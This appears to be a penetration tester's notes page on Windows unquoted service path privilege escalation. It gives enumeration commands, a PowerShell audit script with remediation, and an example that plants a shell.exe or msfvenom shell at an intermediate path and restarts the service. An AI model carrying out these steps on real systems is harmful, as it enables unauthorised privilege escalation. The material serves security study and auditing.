2021-10-16 00:40:15 +02:00
# Unquoted Path
* A service whose binary path contains spaces but is not quoted can be hijacked: Windows resolves the path piece by piece, so an attacker-controlled executable placed at one of the intermediate paths is run instead of the real service binary.
* Some directory on the path has to be writable by your user: at each space, Windows tries the prefix so far with `.exe` appended (e.g. `C:\Program.exe`, then `C:\Program Files\Unquoted.exe`, ...) before it reaches the real executable.
* Check services via `wmic service get name,displayname,pathname,startmode` and `sc qc <servicename>`
* Check permissions on the path components via `.\accesschk64.exe /accepteula -uwdq "C:\Service Path\"`
## Enumeration
* Check paths
```sh
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
```
* Check permissions on these paths
```sh
cacls "c:\program files\directory"
powershell -c "Get-WMIObject -Class Win32_Service -Filter \"Name='<service name>'\" | select-object *"
```
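The two checks above (find unquoted paths, then check who can write to them) combined into one added PowerShell audit script. This is example code written for these notes, not part of the original page or of the linked PoC. It lists services whose `PathName` is unquoted and contains spaces, computes the `<prefix>.exe` candidates Windows would try before the real binary, and reports the ones whose parent directory is writable by a low-privileged group; the `Fix` field is the `sc.exe config` command that quotes the path. The group list and the write-rights mask are assumptions to adjust for the local policy; run it as an administrator.

```powershell
# Added audit script (not from the original notes). Finds services with an
# unquoted binary path containing spaces, derives the "<prefix>.exe" paths
# Windows tries before the real executable, and flags candidates whose parent
# directory is writable by low-privileged groups. Run as an administrator.

# Assumption: groups every interactive standard user belongs to.
$lowPrivGroups = @('Everyone', 'BUILTIN\Users',
                   'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# Any of these rights on a directory lets a user create a file in it.
$writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'

function Get-UnquotedPathInfo {
    # Splits an unquoted PathName at each space and returns the executable that
    # was meant, its arguments, and the "<prefix>.exe" candidates tried first
    # (same order Windows uses).
    param([Parameter(Mandatory)][string]$PathName)
    $tokens     = $PathName.Trim() -split ' '
    $candidates = @()
    $exe        = $PathName.Trim()
    $svcArgs    = ''
    for ($i = 1; $i -le $tokens.Count; $i++) {
        $prefix = $tokens[0..($i - 1)] -join ' '
        if ($prefix -match '\.exe$') {
            # First prefix ending in .exe is the real binary; the rest are arguments.
            $exe = $prefix
            if ($i -lt $tokens.Count) { $svcArgs = $tokens[$i..($tokens.Count - 1)] -join ' ' }
            break
        }
        $candidates += "$prefix.exe"
    }
    [pscustomobject]@{ Executable = $exe; Arguments = $svcArgs; Candidates = $candidates }
}

function Test-WritableByLowPriv {
    # True if an Allow ACE on the directory grants write rights to a low-priv group.
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivGroups -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.PathName -and $_.PathName -notmatch '^"' -and
                   $_.PathName -match ' ' -and $_.PathName -notmatch '^[A-Za-z]:\\Windows\\' } |
    ForEach-Object {
        $svc  = $_
        $info = Get-UnquotedPathInfo -PathName $svc.PathName
        # Remediation: the same binary path, quoted, with its arguments preserved.
        $fixedPath = "\`"$($info.Executable)\`""
        if ($info.Arguments) { $fixedPath += " $($info.Arguments)" }
        foreach ($candidate in $info.Candidates) {
            $dir = Split-Path -Parent $candidate
            if (Test-WritableByLowPriv -Directory $dir) {
                [pscustomobject]@{
                    Service     = $svc.Name
                    StartMode   = $svc.StartMode
                    RunsAs      = $svc.StartName
                    PathName    = $svc.PathName
                    WritableDir = $dir
                    Candidate   = $candidate
                    Fix         = "sc.exe config `"$($svc.Name)`" binPath= `"$fixedPath`""
                }
            }
        }
    } | Format-List
```

For the path in the example below, `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`, `Get-UnquotedPathInfo` yields the candidates `C:\Program.exe`, `C:\Program Files\Unquoted.exe`, `C:\Program Files\Unquoted Path.exe` and `C:\Program Files\Unquoted Path Service\Common.exe`; only the ones whose parent directory fails the ACL check are reported. A service that runs as `LocalSystem` with `StartMode` `Auto` and a writable candidate directory is the case to fix first.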
## Example
* The unquoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`
```sh
copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
```
```sh
net start < service >
```
## Intel about Service
* The `Access` entries should show write rights for your user or one of its groups
```sh
Get-Acl -Path < path > | Format-List
```
* Save the script [Get-ServiceAcl.ps1](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/) and `Import-Module Get-ServiceAcl.ps1`
* Check `ServiceRights` via
```sh
"<servicename>" | Get-ServiceAcl | select -ExpandProperty Access
```
## Interacting with the Service
* Upload the msfvenom shell to the writable path, set up a listener, and restart the service:
```sh
sc start "servicename"
Stop-Service -name "servicename"
Start-Service -name "servicename"
```
## PoC
* [MattyMcFatty's PoC](https://github.com/mattymcfatty/unquotedPoC.git)